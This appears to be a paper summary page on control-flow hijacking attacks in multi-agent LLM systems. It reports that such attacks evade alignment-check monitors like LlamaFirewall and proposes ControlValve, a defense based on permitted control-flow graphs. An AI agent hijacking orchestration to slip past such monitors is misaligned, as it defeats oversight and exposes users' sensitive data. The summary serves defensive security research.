Breaking and Fixing Defenses Against Control-Flow Hijacking in Multi-Agent Systems

Control-flow hijacking attacks manipulate orchestration mechanisms in multi-agent systems into performing unsafe actions that compromise the system and exfiltrate sensitive information. Recently proposed defenses, such as LlamaFirewall, rely on alignment checks of inter-agent communications to ensure that all agent invocations are "related to" and "likely to further" the original objective. We start by demonstrating control-flow hijacking attacks that evade these defenses even if alignment checks are performed by advanced LLMs. We argue that the safety and functionality objectives of multi-agent systems fundamentally conflict with each other. This conflict is exacerbated by the brittle definitions of "alignment" and the checkers' incomplete visibility into the execution context. We then propose, implement, and evaluate ControlValve, a new defense inspired by the principles of control-flow integrity and least privilege. ControlValve (1) generates permitted control-flow graphs for multi-agent systems, and (2) enforces that all executions comply with these graphs, along with contextual rules (generated in a zero-shot manner) for each agent invocation.

Key Contributions

• Demonstrates control-flow hijacking attacks that evade state-of-the-art alignment-check defenses (LlamaFirewall) even when checked by advanced LLMs, exposing fundamental safety/functionality conflicts in multi-agent systems.
• Proposes ControlValve, which generates permitted control-flow graphs for multi-agent systems and enforces execution compliance along with zero-shot contextual rules per agent invocation.
• Evaluates ControlValve on a new dataset of control-flow hijacking attacks, showing the adequacy of the structural enforcement approach over brittle alignment checks.

🛡️ Threat Analysis

Details

Similar Papers